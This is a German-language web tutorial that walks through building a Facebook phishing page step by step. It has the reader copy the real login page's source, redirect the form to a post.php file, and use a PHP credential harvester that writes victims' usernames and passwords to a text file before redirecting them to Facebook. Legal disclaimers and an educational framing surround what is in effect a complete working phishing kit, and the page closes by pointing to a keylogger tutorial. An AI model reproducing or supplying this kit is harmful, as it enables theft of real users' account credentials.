Loading…
Eine Facebook Phishing-Seite erstellen

Eine Facebook Phishing-Seite erstellen

In diesem Tutorial zeige ich dir wie man eine Facebook Phishing-Seite erstellen kann, um Benutzernamen und Passwörter abzufangen, mit denen die Facebook-Konten anderer Nutzer gehackt werden können.

Aber dieses Wissen sollte niemals dazu benutzt werden fremde Facebook Accounts zu hacken. Es ist einfach nicht legal, und verstößt gegen das Strafgesetzbuch StGB § 202c.

Lese dir dazu bitte auch den Haftungsausschluss durch.

Für aufstrebende und ethische Hacker ist es aber von großem Wert zu verstehen, wie Phishing funktioniert. Es hilft nicht nur Fehler zu vermeiden, welche deine Sicherheit und deine Privatsphäre bedrohen, sondern hilft dir auch Phishing-Seiten zu erkennen.

Was ist Phishing?

Phishing bedeutet Nutzerdaten wie Benutzername und Passwort mit einer gefälschten Webseite abzufangen. Die gefälschte Phishing-Webseite ist im Grunde eine Nachahmung der originalen Webseite, wie hier am Beispiel von Facebook. Angreifer verwenden diese Methode häufig, um Benutzernamen und Passwörter zu stehlen. Am häufigsten funktioniert der Prozess wie folgt:

Ein Nutzer klickt auf einen Link zu einer Phishing-Webseite. In dem Glauben, dass er sich auf der echten Webseite befindet, gibt er seine Zugangsdaten ein. Es gibt nur ein Problem. Das Opfer des Angreifers hat seine privaten Informationen auf der Webseite eines Hackers eingegeben. Und jetzt hat der Hacker die sensiblen Zugangsdaten!

Wenn es sich beispielsweise um das Facebook-Profil eines Unternehmens handelt, kann dies dem Unternehmen erheblich schaden. In diesem Tutorial werde ich eine nachgemachte Facebook-Login-Seite einrichten, um dir zu zeigen, wie einfach es ist einen Phishing-Angriff durchzuführen.

Eine Facebook Phishing-Seite erstellen – Tutorial

Benötigtes Equipment

Schritt 1

Öffne die Webseite www.facebook.com.

eine_facebook_phishing-seite_erstellen

Schritt 2

Klicken dann mit der rechten Maustaste auf einen leeren Bereich der Anmeldeseite. In diesem Augenblick darfst du nicht selbst bei Facebook angemeldet sein. Öffne die Funktion „Seitenquelltext anzeigen“ (google Chrome Browser).

eine_facebook_phishing-seite_erstellen

Schritt 3

Kopiere den gesamten Quellcode der Seite und füge ihn in ein neues Notepad-Dokument ein (oder im einfachen Texteditor deines Betriebssystems).

Schritt 4

Wenn du Notepad verwendest, drücke „Strg F“  und suche nach „Aktion=„.
Du solltest eine Zeile sehen, die folgendermaßen aussieht:
action = „https://www.facebook.com/login.php?login_attempt=1&1wv=110“
Lösche alles, was innerhalb der Anführungszeichen steht, und füge stattdessen „post.php“ ein.
Speicher diese Datei auf deinem Computer mit dem Dateinamen index.htm ab.

eine_facebook_phishing-seite_erstellen

Schritt 5

Als nächstes erstelle ein neues Notepad-Dokument mit dem Namen post.php. Kopiere den folgenden Code und füge ihn in das Dokument ein. Anschließend kann das Dokument gespeichert werden.

header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Schritt 6

An dieser Stelle solltest du nun zwei Dateien gespeichert haben:
index.htm und post.php

Als nächstes muss dieser Code tatsächlich zu einem Webhosting-Dienst hochgeladen werden. Es gibt kostenlose Hosting-Anbieter, aber ich würde dir nicht empfehlen, diesen Code tatsächlich online zu veröffentlichen. Ab diesem Zeitpunkt würdest du eine Straftat begehen. Denn sobald die Phishing-Seite online ist, könnte sie von jedem Internet-Nutzer aufgerufen werden. Bereits das Vorbereiten des Ausspähens und Abfangens von Daten ist strafbar!
Ich verweise daher hier noch ein weiteres mal auf den Haftungsausschluss und auf das Strafgesetzbuch StGB § 202c.

Schritt 7

Nachdem die erstellten Daten index.htm und post.php hochgeladen wurden ist die Facebook Phishing-Seite fertig.
Klickt man nun auf den Link zur index.htm Datei öffnet sich die erstellte Facebook Phishing-Seite. Diese sollte fast identisch mit der Facebook-Login-Seite aussehen. Gibt ein Opfer nun seine Benutzerdaten ein, wird auf dem Webserver automatisch eine Textdatei mit dem Namen username.txt generiert. Diese Datei enthält nun die sensiblen Benutzerdaten des Opfers.

Fazit

Eine Facebook Phishing-Seite erstellen ist wirklich einfach. Den Code vom Facebook-Login-Bildschirm kopieren, etwas PHP-Code hinzuzufügen und alles online zur Verfügung stellen. Mache dieses aber bitte nicht auf einem öffentlich zugänglichen Webserver, die strafrechtlichen Konsequenzen könnten schrecklich für dich sein. In einer Heimumgebung auf deinem eigenen Offline-Server bietet dir dieses Tutorial jedoch einen guten Einblick auf die Frage, wie Angreifer an Benutzernamen und Passwörter gelangen können. Ein Facebook Account läßt sich natürlich auch mit einem Software oder Hardware Keylogger Hacken. Ein Tutorial über den AirDrive Hardware Keylogger findest du hier – AirDrive Hardware Keylogger mit Wi-Fi.